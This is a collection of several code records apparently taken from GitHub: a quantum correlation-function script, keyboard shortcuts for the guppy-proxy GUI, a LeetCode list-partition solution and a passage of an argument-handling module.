+ (j+1)*np.sqrt(j)\n\t\tif i == (j-3):\n\t\t\tx3_mtrx[i,j] = np.sqrt(j*(j-1)*(j-2))\nx3_mtrx *= (2.0*mass)**(-1.5)\n\n### x^4 matrix\nx4_mtrx = np.zeros((nb,nb))\nfor i in range(nb):\n\tfor j in range(nb):\n\t\tif i == (j+4):\n\t\t\tx4_mtrx[i,j] = np.sqrt((j+1)*(j+2)*(j+3)*(j+4))\n\t\tif i == (j+2):\n\t\t\tx4_mtrx[i,j] = j*np.sqrt((j+1)*(j+2)) + np.sqrt(j+2)*(j+1)**(1.5) + np.sqrt(j+1)*(j+2)**(1.5) + np.sqrt((j+1)*(j+2))*(j+3)\n\t\tif i == j:\n\t\t\tx4_mtrx[i,j] = j*(j-1) + j*j + 2*j*(j+1) + (j+1)*(j+1) + (j+1)*(j+2)\n\t\tif i == (j-2):\n\t\t\tx4_mtrx[i,j] = (j-2)*np.sqrt(j*(j-1)) + np.sqrt(j)*(j-1)**(1.5) + np.sqrt(j-1)*(j)**(1.5) + np.sqrt(j*(j-1))*(j+1)\n\t\tif i == (j-4):\n\t\t\tx4_mtrx[i,j] = np.sqrt(j*(j-1)*(j-2)*(j-3))\nx4_mtrx *= (2.0*mass)**(-2)\n\n### Hamiltonian\nHam = 0.5 * p2_mtrx + a * x2_mtrx + b * x3_mtrx + c * x4_mtrx\n\nprint('End Hamiltonian construction')\n\n###================================================================\n\n###================================================================\n### Diagonalization of the Hamiltonians\n\nprint('Begin diagonalization')\n\nvals,vecs = linn.eigh(Ham)\n\nprint('End diagonalization')\n###================================================================\n\n###================================================================\n### compute partition functions\n\nZ = 0.0\nfor i in range(tnb):\n\tZ += np.exp(-beta*vals[i])\n\nprint('Z = ',Z)\n\nfor i in range(1,2):\n print(vals[i]/vals[i-1])\nif only_freq:\n sys.exit()\n###================================================================\n\n###================================================================\n### Build the observables matrix in the energy eigen-basis\n###================================================================\n### The matrix elements must be expanded in HO eigenstates and weighted \n### by the coeficients of the HO eigenstates\n### |n> = Sum_j_{0}^{nb} c_j*|j>\n\nprint('Begin building of observables matrix')\n\nclist = np.zeros((tnb,tnb+2))\nfor n in range(tnb):\n\tfor j in range(tnb):\t# indexes are inverted\n\t\tclist[n,j] = vecs[j,n]\n\n### observable X\n\nx_eig = np.zeros((tnb,tnb)) \nfor f in range(tnb):\n\tfor g in range(tnb):\n\t\tfor i in range(tnb):\n\t\t\tx_eig[f,g] += clist[f,i]*clist[g,i-1]*np.sqrt(i) + clist[f,i]*clist[g,i+1]*np.sqrt(i+1)\nx_eig *= 2.**(-0.5)\n\n### observable X^2\n\nx2_eig = np.zeros((tnb,tnb)) \nfor f in range(tnb):\n\tfor g in range(tnb):\n\t\tfor i in range(tnb):\n\t\t\tx2_eig[f,g] += clist[f,i]*clist[g,i-2]*np.sqrt(i*(i-1)) + clist[f,i]*clist[g,i]*(2*i+1)+clist[f,i]*clist[g,i+2]*np.sqrt((i+1)*(i+2))\nx2_eig *= 2.**(-1)\n\nprint('End building of observables matrix')\n###================================================================\n\n###================================================================\n### Define observables\n\nif(A_obs=='x'):\n\tA = x_eig\nelif(A_obs=='x2'):\n\tA = x2_eig\n\nif(B_obs=='x'):\n\tB = x_eig\nelif(B_obs=='x2'):\n\tB = x2_eig\n\nif(C_obs=='x'):\n\tC = x_eig\nelif(C_obs=='x2'):\n\tC = x2_eig\n\n###================================================================\n### Evaluate the KT correlation <A;B(t1)>\n### Note: Evaluation of KT as Re{<A;B(t1)>}\n\nprint('Begin KT')\n\nKT = np.zeros(nstep,dtype=complex)\n\nfor t1 in range(nstep):\n\tprint('step ',t1,' of ',nstep,'total')\n\n\tfor n in range(tnb):\t# trace\n\t\tfor m in range(tnb):\n\t\t\t\tfct_beta = np.exp(-beta*vals[n]) \n\t\t\t\tif (n==m):\n\t\t\t\t\tfct_beta *= beta\n\t\t\t\telse:\n\t\t\t\t\tfreq = vals[n] - vals[m] \n\t\t\t\t\tfct_beta *= (np.exp(beta*freq) - 1.) / freq\n\n\t\t\t\tKT[t1] += fct_beta\t\\\n\t\t\t\t\t * A[n,m]\t\t\\\n\t\t\t\t\t * B[m,n] * np.exp(1.j*time[t1]*(vals[m]-vals[n])) \n\nKT /= (beta*Z)\n\n### taking Re{KT}\n\nKT = KT.real\n\nprint('End KT')\n###================================================================\n\n###================================================================\n### Evaluate the DKT correlation <A;B(t1);C(t2)>\n### Note: Analytic integration of DOuble Kubo integral\n\nif compute_DKT:\n\tprint('Begin DKT')\n\tDKT = np.zeros([nstep,nstep],dtype=complex)\n\tDKTp1 = np.zeros([nstep,nstep],dtype=complex)\n\tDKTp2 = np.zeros([nstep,nstep],dtype=complex)\n\tDKTpp = np.zeros([nstep,nstep],dtype=complex)\n\tDKTpp2 = np.zeros([nstep,nstep],dtype=complex)\n\n\tfor t1 in range(nstep):\n\t\tprint('step ',t1,' of ',nstep,'total')\n\t\tfor t2 in range(nstep):\n\n\t\t\tfor q in range(tnb):\n\t\t\t\tfor r in range(tnb):\n\t\t\t\t\tfor s in range(tnb):\n\n\t\t\t\t\t\tif s == r == q:\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*beta**2/2. \n\t\t\t\t\t\telif r == s:\n\t\t\t\t\t\t\tdelta = (vals[q]-vals[r])\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])/delta**2 * ( np.exp(beta*delta)*(beta*delta-1.)+1) \n\t\t\t\t\t\telif q == s:\n\t\t\t\t\t\t\tB_ijk = (np.exp(beta*(vals[q]-vals[r]))-1.) / ((vals[q]-vals[r])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*(beta/(vals[r]-vals[s]) - B_ijk) \n\t\t\t\t\t\telif q == r:\n\t\t\t\t\t\t\tA_ijk = (np.exp(beta*(vals[q]-vals[s]))-1.) / ((vals[q]-vals[s])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*(A_ijk - beta/(vals[r]-vals[s])) \n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tA_ijk = (np.exp(beta*(vals[q]-vals[s]))-1.) / ((vals[q]-vals[s])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tB_ijk = (np.exp(beta*(vals[q]-vals[r]))-1.) / ((vals[q]-vals[r])*(vals[r]-vals[s]))\n\t\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])*(A_ijk-B_ijk) \n\n\t\t\t\t\t\tDKT[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r]\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\n\t\t\t\t\t\tDKTp1[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] * (1.j) * (vals[q] - vals[r])\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\t\t\t\t\t\t\n\t\t\t\t\t\tDKTp2[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] \\\n\t\t\t\t\t\t * B[r,s] * (1.j)*(vals[r] - vals[s]) * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\n\t\t\t\t\t\tDKTpp[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] * (1.j)*(vals[q] - vals[r])\t\\\n\t\t\t\t\t\t * B[r,s] * (1.j)*(vals[r] - vals[s]) * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\t\t\t\t\t\t\n\t\t\t\t\t\tDKTpp2[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r] * (1.j)*(vals[q] - vals[r])\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * (1.j)*(vals[s] - vals[q]) * np.exp(1.j*time[t2]*(vals[s] - vals[q]))\n\t\t\t\t\t\n\n\tDKT /= (Z*beta**2)\n\tDKTp1 /= (Z*beta**2)\n\tDKTp2 /= (Z*beta**2)\n\tDKTpp /= (Z*beta**2)\n\tDKTpp2 /= (Z*beta**2)\n\n\tprint('End DKT ')\n\n###================================================================\n\n\nif compute_PB:\n\tprint('Begin KT_PB')\n\n\tKT_PB_ABC = np.zeros([nstep,nstep],dtype=complex)\n\tKT_PB_ABCp = np.zeros([nstep,nstep],dtype=complex)\n\tKT_PB_CBA = np.zeros([nstep,nstep],dtype=complex)\n\tKT_PB_CBAp = np.zeros([nstep,nstep],dtype=complex)\n\n\n\tfor t1 in range(nstep):\n\t\tprint('step ',t1,' of ',nstep,'total')\n\t\tfor t2 in range(nstep):\n\t\t\tfor q in range(tnb):\n\t\t\t\tfor r in range(tnb):\n\t\t\t\t\tfor s in range(tnb):\n\t\t\t\t\t\tfreq1 = vals[q] - vals[r] \n\t\t\t\t\t\tfreq2 = vals[r] - vals[s] \n\t\t\t\t\t\tfreq3 = vals[s] - vals[q] \n\t\t\t\t\t\tfreq4 = vals[q] - vals[s] \n\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q]) \n\t\t\t\t\t\t#if (q==r):\n\t\t\t\t\t\tif (q==s):\n\t\t\t\t\t\t\tfct_beta *= beta\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t#fct_beta *= (np.exp(beta*freq1) - 1.) / (freq1)\n\t\t\t\t\t\t\tfct_beta *= (np.exp(beta*freq4) - 1.) / (freq4)\n\t\t\t\t\t\t#aux_1 = fct_beta * A[q,r] * B[r,s] * C[s,q] * np.exp(1.j*time[t2]*(freq1)) * np.exp(1.j*time[t1]*(freq2)) \n\t\t\t\t\t\t#aux_2 = fct_beta * A[q,r] * C[r,s] * B[s,q] * np.exp(1.j*time[t2]*(freq1)) * np.exp(1.j*time[t1]*(freq3)) \n\t\t\t\t\t\taux_1a = fct_beta * A[q,r] * B[r,s] * C[s,q] * np.exp(1.j*time[t2]*(freq3)) * np.exp(1.j*time[t1]*(freq2)) \n\t\t\t\t\t\taux_1b = fct_beta * A[r,s] * B[q,r] * C[s,q] * np.exp(1.j*time[t2]*(freq3)) * np.exp(1.j*time[t1]*(freq1)) \n\t\t\t\t\t\taux_2a = fct_beta * C[q,r] * B[r,s] * A[s,q] * np.exp(1.j*time[t2]*(freq1)) * np.exp(1.j*time[t1]*(freq2)) \n\t\t\t\t\t\taux_2b = fct_beta * C[r,s] * B[q,r] * A[s,q] * np.exp(1.j*time[t2]*(freq2)) * np.exp(1.j*time[t1]*(freq1)) \n\t\n\t\t\t\t\t\tKT_PB_ABC[t1,t2] += (1.j/hbar)*(aux_1a - aux_1b)\n\t\t\t\t\t\tKT_PB_ABCp[t1,t2] += (1.j/hbar)* (1.j/hbar)* ( (aux_1a * (vals[q]-vals[r])) - (aux_1b * (vals[r]-vals[s])) )\n\t\n\t\t\t\t\t\tKT_PB_CBA[t1,t2] += (1.j/hbar)*(aux_2a - aux_2b)\n\t\t\t\t\t\tKT_PB_CBAp[t1,t2] += (1.j/hbar)* (1.j/hbar)* ( (aux_2a * (vals[s]-vals[q])) - (aux_2b * (vals[s]-vals[q])) )\n\n\n\n\tKT_PB_ABC /= (beta*Z)\n\tKT_PB_ABCp /= (beta*Z)\n\tKT_PB_CBA /= (beta*Z)\n\tKT_PB_CBAp /= (beta*Z)\n\n\tprint('End KT_PB_ABC')\n\n###=====================================================================\n### Evaluate standard functions (i.e. C_{ABC}) \nif compute_std:\n\tprint('Begin standard TCF')\n\n\tC_ABC = np.zeros([nstep,nstep],dtype=complex)\n\tC_BCA = np.zeros([nstep,nstep],dtype=complex)\n\tC_CAB = np.zeros([nstep,nstep],dtype=complex)\n\tC_ACB = np.zeros([nstep,nstep],dtype=complex)\n\tC_CBA = np.zeros([nstep,nstep],dtype=complex)\n\tC_BAC = np.zeros([nstep,nstep],dtype=complex)\n\n\tfor t1 in range(nstep):\n\t\tprint('step ',t1,' of ',nstep,'total')\n\t\tfor t2 in range(nstep):\n\t\t\tfor q in range(tnb):\n\t\t\t\tfor r in range(tnb):\n\t\t\t\t\tfor s in range(tnb):\n\t\n\t\t\t\t\t\tfct_beta = np.exp(-beta*vals[q])\n\t\n\t\t\t\t\t\tC_ABC[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r]\t\t\t\\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q])) \n\n\t\t\t\t\t\tC_BCA[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * B[q,r] * np.exp(1.j*time[t1]*(vals[q] - vals[r]))\t\\\n\t\t\t\t\t\t * C[r,s] * np.exp(1.j*time[t2]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * A[s,q]\t\n\n\t\t\t\t\t\tC_CAB[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * C[q,r] * np.exp(1.j*time[t2]*(vals[q] - vals[r]))\t\\\n\t\t\t\t\t\t * A[r,s]\t\\\n\t\t\t\t\t\t * B[s,q] * np.exp(1.j*time[t1]*(vals[s] - vals[q]))\n\n\t\t\t\t\t\tC_BAC[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * B[q,r] * np.exp(1.j*time[t1]*(vals[q] - vals[r]))\t\\\n\t\t\t\t\t\t * A[r,s]\t\t\\\n\t\t\t\t\t\t * C[s,q] * np.exp(1.j*time[t2]*(vals[s] - vals[q])) \n\n\t\t\t\t\t\tC_ACB[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * A[q,r]\t\t\\\n\t\t\t\t\t\t * C[r,s] * np.exp(1.j*time[t2]*(vals[r] - vals[s])) \\\n\t\t\t\t\t\t * B[s,q] * np.exp(1.j*time[t1]*(vals[s] - vals[q]))\t\n\n\t\t\t\t\t\tC_CBA[t1,t2] += fct_beta\t\\\n\t\t\t\t\t\t * C[q,r] * np.exp(1.j*time[t2]*(vals[q] - vals[r])) \\\n\t\t\t\t\t\t * B[r,s] * np.exp(1.j*time[t1]*(vals[r] - vals[s]))\t\\\n\t\t\t\t\t\t * A[s,q]\t\t\n\n\n\tC_ABC /= Z\n\tC_BCA /= Z\n\tC_CAB /= Z\n\tC_BAC /= Z\n\tC_ACB /= Z\n\tC_CBA /= Z\n\n\tprint('End standard TCF')\n#=====================================================================\n\n#=====================================================================\n### save data to file\n\nif compute_PB:\n\t### KT_PT: order is [time, time, KT_PB.real, KT_PB.imag]\n\toutput= open('KT_PB_ABC.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_ABC.real[i,j],KT_PB_ABC.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('KT_PB_ABCp.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_ABCp.real[i,j],KT_PB_ABCp.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('KT_PB_CBA.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_CBA.real[i,j],KT_PB_CBA.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('KT_PB_CBAp.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],KT_PB_CBAp.real[i,j],KT_PB_CBAp.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\nif compute_DKT:\n\t### KT: order is [time, KT]\n\toutput= open('KT.dat', 'w')\n\tfor i in range(nstep):\n\t\toutput.write('{} {} \\n'.format(time[i],KT[i]))\n\toutput.close()\n\n\t### DKT: order is [time, time, DKT.real, DKT.imag]\n\toutput= open('DKT.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKT.real[i,j],DKT.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('DKTp1.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTp1.real[i,j],DKTp1.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\toutput= open('DKTp2.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTp2.real[i,j],DKTp2.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('DKTpp.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTpp.real[i,j],DKTpp.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\toutput= open('DKTpp2.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j],DKTpp2.real[i,j],DKTpp2.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\nif compute_std:\n\n\t### C_ABC: order is [time, time, C.real, C.imag]\n\toutput= open('C_ABC.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_ABC.real[i,j],C_ABC.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_BCA: order is [time, time, C.real, C.imag]\n\toutput= open('C_BCA.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_BCA.real[i,j],C_BCA.imag[i,j]))\n\toutput.close()\n\n\t### C_CAB: order is [time, time, C.real, C.imag]\n\toutput= open('C_CAB.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_CAB.real[i,j],C_CAB.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_ACB: order is [time, time, C.real, C.imag]\n\toutput= open('C_ACB.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_ACB.real[i,j],C_ACB.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_CBA: order is [time, time, C.real, C.imag]\n\toutput= open('C_CBA.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_CBA.real[i,j],C_CBA.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t### C_BAC: order is [time, time, C.real, C.imag]\n\toutput= open('C_BAC.dat', 'w')\n\tfor i in range(nstep):\n\t\tfor j in range(nstep):\n\t\t\toutput.write('{} {} {} {} \\n'.format(time[i],time[j], C_BAC.real[i,j],C_BAC.imag[i,j]))\n\t\toutput.write('\\n')\n\toutput.close()\n\n\t#=====================================================================\n\t### End program\nt_final=get_time.time()\nprint('DONE in {}s!!'.format(t_final-t_init))\n","repo_name":"litman90/Monodromy","sub_path":"scripts/exact_code_DKT.py","file_name":"exact_code_DKT.py","file_ext":"py","file_size_in_byte":20107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6821525459","text":"from guppyproxy.util import display_info_box, paste_clipboard\nfrom PyQt5.QtCore import pyqtSlot, QObject, Qt\nfrom PyQt5.QtWidgets import QShortcut \nfrom PyQt5.QtGui import QKeySequence\n\nclass GuppyShortcuts(QObject):\n \n ACT_NAV_FILTER_TEXT = 0\n ACT_NAV_FILTER_DROPDOWN = 1\n ACT_NAV_HISTORY = 2\n ACT_NAV_TREE = 3\n ACT_NAV_REPEATER = 4\n ACT_NAV_INTERCEPTOR = 5\n ACT_NAV_DECODER = 6\n ACT_NAV_DECODER_PASTE = 7\n ACT_NAV_FILTER_POP = 8\n ACT_OPEN = 9\n ACT_NEW = 10\n ACT_NAV_MACRO_ACTIVE = 11\n ACT_NAV_MACRO_INT = 12\n\n def __init__(self, guppy_window):\n QObject.__init__(self)\n self.guppy_window = guppy_window\n self.combos = {}\n\n self.add_shortcut(self.ACT_NAV_FILTER_TEXT,\n \"Navigate to filter text input\",\n self.nav_to_filter_text,\n QKeySequence(Qt.CTRL+Qt.Key_U))\n\n self.add_shortcut(self.ACT_NAV_FILTER_DROPDOWN,\n \"Navigate to filter dropdown input\",\n self.nav_to_filter_dropdown,\n QKeySequence(Qt.CTRL+Qt.Key_I))\n\n self.add_shortcut(self.ACT_NAV_FILTER_POP,\n \"Navigate to filters and pop most recent filter\",\n self.nav_to_filter_pop,\n QKeySequence(Qt.CTRL+Qt.Key_P))\n\n self.add_shortcut(self.ACT_NAV_HISTORY,\n \"Navigate to request list\",\n self.nav_to_history,\n QKeySequence(Qt.CTRL+Qt.Key_J))\n\n self.add_shortcut(self.ACT_NAV_TREE,\n \"Navigate to tree view\",\n self.nav_to_tree,\n QKeySequence(Qt.CTRL+Qt.Key_T))\n\n self.add_shortcut(self.ACT_NAV_REPEATER,\n \"Navigate to repeater\",\n self.nav_to_repeater,\n QKeySequence(Qt.CTRL+Qt.Key_R))\n\n self.add_shortcut(self.ACT_NAV_INTERCEPTOR,\n \"Navigate to interceptor\",\n self.nav_to_interceptor,\n QKeySequence(Qt.CTRL+Qt.Key_E))\n\n self.add_shortcut(self.ACT_NAV_DECODER,\n \"Navigate to decoder\",\n self.nav_to_decoder,\n QKeySequence(Qt.CTRL+Qt.Key_D))\n\n self.add_shortcut(self.ACT_NAV_DECODER_PASTE,\n \"Navigate to decoder and fill with clipboard\",\n self.nav_to_decoder_and_paste,\n QKeySequence(Qt.CTRL+Qt.SHIFT+Qt.Key_D))\n\n self.add_shortcut(self.ACT_OPEN,\n \"Open datafile\",\n self.open_datafile,\n QKeySequence(Qt.CTRL+Qt.SHIFT+Qt.Key_O))\n\n self.add_shortcut(self.ACT_NEW,\n \"New datafile\",\n self.new_datafile,\n QKeySequence(Qt.CTRL+Qt.SHIFT+Qt.Key_N))\n\n self.add_shortcut(self.ACT_NAV_MACRO_ACTIVE,\n \"Navigate to active macros\",\n self.nav_to_active_macros,\n QKeySequence(Qt.CTRL+Qt.Key_M))\n\n self.add_shortcut(self.ACT_NAV_MACRO_INT,\n \"Navigate to intercepting macros\",\n self.nav_to_int_macros,\n QKeySequence(Qt.CTRL+Qt.Key_N))\n\n\n def add_shortcut(self, action, desc, func, key=None):\n sc = QShortcut(self.guppy_window)\n self.combos[action] = (sc, desc)\n sc.activated.connect(func)\n if key:\n sc.setKey(key)\n\n def set_key(self, action, key):\n sc = self.combos[action][0]\n sc.setKey(key)\n\n def get_desc(self, action):\n return self.combos[action][1]\n \n @pyqtSlot()\n def nav_to_filter_text(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_filters()\n self.guppy_window.historyWidget.set_filter_is_text(True)\n self.guppy_window.historyWidget.filterWidg.entry.text_entry.textEntry.setFocus()\n\n @pyqtSlot()\n def nav_to_filter_dropdown(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_filters()\n self.guppy_window.historyWidget.set_filter_is_text(False)\n\n @pyqtSlot()\n def nav_to_filter_pop(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_filters()\n self.guppy_window.historyWidget.filterWidg.pop_phrase()\n\n @pyqtSlot()\n def nav_to_history(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_history()\n self.guppy_window.historyWidget.reqview.show_message()\n\n @pyqtSlot()\n def nav_to_tree(self):\n self.guppy_window.show_hist_tab()\n self.guppy_window.historyWidget.show_tree()\n\n @pyqtSlot()\n def nav_to_repeater(self):\n self.guppy_window.show_repeater_tab()\n\n @pyqtSlot()\n def nav_to_interceptor(self):\n self.guppy_window.show_interceptor_tab()\n\n @pyqtSlot()\n def nav_to_decoder(self):\n self.guppy_window.show_decoder_tab()\n\n @pyqtSlot()\n def nav_to_decoder_and_paste(self):\n self.guppy_window.show_decoder_tab()\n text = paste_clipboard()\n self.guppy_window.decoderWidget.decoder_input.editor.set_bytes(text.encode())\n\n @pyqtSlot()\n def open_datafile(self):\n self.guppy_window.settingsWidget.datafilewidg.open_datafile()\n \n @pyqtSlot()\n def new_datafile(self):\n self.guppy_window.settingsWidget.datafilewidg.new_datafile()\n\n @pyqtSlot()\n def nav_to_active_macros(self):\n self.guppy_window.show_active_macro_tab()\n\n @pyqtSlot()\n def nav_to_int_macros(self):\n self.guppy_window.show_int_macro_tab()\n","repo_name":"roglew/guppy-proxy","sub_path":"guppyproxy/shortcuts.py","file_name":"shortcuts.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"16"} +{"seq_id":"22853363067","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n if not head:\n return None\n \n queue_1 = []\n queue_2 = []\n\n while head:\n if head.val < x:\n queue_1.append(head)\n else:\n queue_2.append(head)\n head = head.next\n \n node = ListNode()\n start = node\n\n while queue_1:\n node.next = queue_1.pop(0)\n node = node.next\n\n while queue_2:\n node.next = queue_2.pop(0)\n node = node.next\n\n node.next = None\n return start.next\n","repo_name":"jinhongliu6688/leetcode-algorithms","sub_path":"86-partition-list/86.py","file_name":"86.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24186532542","text":"\"\"\"\nArguments represent the primary tool for passing data between tasks.\nThey main class :class:`Argument` is a serializable key-value pair.\n\"\"\"\n\nfrom . import factory\nimport re\nimport json\nfrom .util import Serializable, UnusedArgFormatter, parse_assert, is_json_primitive, is_json_serializable\n\n\nARGUMENT_KEY_RE_STR = '[\\w\\d]+[\\w\\d_]*'\n\"\"\"A key of an argument must match this string\"\"\"\nARGUMENT_KEY_RE = re.compile('^' + ARGUMENT_KEY_RE_STR + '$')\n\"\"\"Compiled version of :data:`wasp.argument.ARGUMENT_KEY_RE`\"\"\"\n\n\nclass MissingArgumentError(Exception):\n \"\"\"\n Raised when an argument is expected to be present, but is missing.\n \"\"\"\n pass\n\n\nclass ArgumentCollection(dict):\n\n @classmethod\n def from_dict(cls, d):\n \"\"\"\n Creates a new :class:`ArgumentCollection` from a dict.\n Keys are expected to be strings.\n Value can be either :class:`Argument`, in which case they are\n used as such, or any other serializable type which is then\n wrappend within an :class:`Argument`.\n \"\"\"\n if d is None:\n return cls()\n ret = cls()\n for k, v in d.items():\n assert isinstance(k, str), 'Expected a dict with string keys.'\n if not isinstance(v, Argument):\n assert is_json_serializable(v), 'Values must be json serializable such that' \\\n 'they can be assigned to an Argument'\n ret.add(Argument(k).assign(v))\n else:\n ret.add(v)\n return ret\n\n def value(self, key, default=None):\n \"\"\"\n Returns the value of the argument associated with ``key``. If ``key`` is not in self,\n returns ``default``\n \"\"\"\n arg = self.get(key)\n if arg is None:\n return default\n return arg.value\n\n def add(self, *args, **kw):\n \"\"\"\n Adds arguments to the collection. Arguments can either be given in \\*args, or\n they can be specified using keyword arguments. Example::\n\n In [1]: foo = Argument('foo').assign('foo')\n In [2]: bar = Argument('bar').assign('bar')\n In [3]: col = ArgumentCollection()\n In [4]: col.add(foo, bar, foobar='test')\n In [5]: col\n Out[5]: {foo = foo, foobar = test, bar = bar}\n \"\"\"\n for arg in args:\n self._add_single(arg)\n for key, value in kw.items():\n self._add_single(Argument(key).assign(value))\n\n def update(self, E=None, **F):\n \"\"\"\n Same as ``dict.update`` but actually calls ``__setitem__``\n of this class.\n \"\"\"\n if E is not None:\n if hasattr(E, 'keys'):\n for k in E.keys():\n self[k] = E[k]\n else:\n for k, v in E:\n self[k] = v\n for k, v in F.items():\n self[k] = v\n\n def _add_single(self, arg):\n \"\"\"\n Adds a single Argument.\n :param arg: non-None object of type Argument.\n \"\"\"\n assert arg is not None\n self[arg.name] = arg\n\n def __setitem__(self, key, value):\n \"\"\"\n Sets self[key] to Argument(key, value=value).\n Otherwise self[key] is set to to value and value is expected to be of type Argument.\n \"\"\"\n key = str(key)\n if is_json_serializable(value) and not isinstance(value, Argument):\n value = Argument(key, value=value)\n assert isinstance(value, Argument), 'Can only set Argument in ArgumentCollection.__setitem__.'\n super().__setitem__(key, value)\n\n def isempty(self):\n \"\"\"\n Returns True if self has contains no items, False otherwise.\n \"\"\"\n return len(self) == 0\n\n def overwrite_merge(self, higher_priority):\n \"\"\"\n Merge ``higher_priority`` into self. If the key is already contained in self,\n overwrite the value of self.\n \"\"\"\n if higher_priority is None:\n return\n for k, v in higher_priority.items():\n self[k] = v\n\n def 